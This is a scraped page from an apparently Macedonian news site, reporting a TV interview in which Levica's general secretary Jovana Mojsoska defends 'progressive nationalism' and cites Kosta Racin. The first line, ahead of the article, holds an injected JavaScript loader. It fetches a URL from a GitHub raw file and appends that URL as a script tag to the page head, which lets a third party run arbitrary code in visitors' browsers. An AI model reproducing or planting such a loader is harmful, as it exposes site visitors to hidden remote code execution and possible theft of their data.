;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Мојсоска: Националните прашања ѝ припагаат и на левицата - Антропол
АктуелноЛокално

Мојсоска: Националните прашања ѝ припагаат и на левицата

Во вчерашната емисија Јади Буре на ТВ Сонце гостин беше Генералниот секретар на Политичката партија Левица Јована Мојсоска. Во текот на емисијата се зборуваше за повеќе актуелни прашања, а прашањето за односот на левицата кон националните прашања привлече особено внимание. Уште на самиот почеток од излагањето таа потенцираше дека националните прашања се дел од левичарската идеологија.

„Не е точно дека левицата не треба да се занимава со национални прашања. Мене ми е жал што ние мора сега некои прашања кои беа затворени повторно да ги отвараме и повторно да објаснуваме колку е македонската нација конститутивен елемент на македонската држава, дека со овие процеси веќе се сведуваме на ниво на етничка група и брзо одиме кон една федерализација.“ 

Што ќе значи една федерализација за Македонија?

„Па, откажување на сите идеали за кои се бореле нашите претходници!“

Од Гоце Делчев наваму?

„И пред Гоце Делчев би рекла! Во однос на хистеријата дека Левица е фашистичка, јас секогаш кога се разгледува некое прашање сметам дека треба да се разгледува во историскиот контекст во кој се случува прашањето, кои настани претходеле и како се причинско-последично поврзани! Така да, ние не можеме да зборуваме само за национализам и де факто ‘лош национализам’ и не можеме да ставаме знак за равенство помеѓу сите национализми. Ние може да разговараме за прогресивен национализам наспроти империјалистички анационализам кој ни се случи за време на референдумот.

Може ли да се спореди национализмот на Французите во Африка со национализмот на поробените народи во Африка? – Таа е таа дистинкција која ние ја правиме и со која се воделе партизаните, па и тие биле апсолутни националисти.

Коста Солев Рацин бил еден од ретките кои така извонредно има посветено и цело писание за Хегел, кој извонредно ја има опишано маката на обичниот работник, а во неговото писание ‘Резултатот’ има еден цитат кај што вели дека: ‘Рушењето на овие услови под кои работам е далеку попродуктивно од условите под кои работам’, На тој начин тој многу добро ја опишал опресијата на македонскиот работник и земјоделец. 

Тој бил член на Комунистичката Партија, а не знам дали се знае дека тој бил избркан одреден период од Комунистичката партија затоа што во тоа време отишла кај српскиот бан за да му ја издаде книгата ‘Бели Мугри’ и комунистите тогаш научиле дека отишол кај банот, па го избркале еден КОСТА СОЛЕВ РАЦИН. Има една интересна анегдота, кога почнала војната тој излегол и се покрил со пепел и го признал срамот, а побарал пушка за да се бори! Тој самиот, ако ги гледате неговите дела, како и Блаже Конески зборувале дека ние мора претходно да ја зајакнеме националната гордост кај македонскиот народ, да го убедиме во неговите сили и да се обедини пролетаријатот во тоа движење за да може за да народот ја добие националната и социјалната слобода, па јас воопшто не би била изненадена сега овие прогресивни анационални граѓани на светот да утре-задутре го прогласат за фашист. 

Ако оние кои го избришаа зборот ‘Македонски’ од институциите, па и оние кои беа амнестирани од воените злосторства, оние кои се поклонуваат пред бугарскиот фашизам, ако тие се анти-фашистите на денешното време, тогаш јас драго би застанала на спротивната страна!“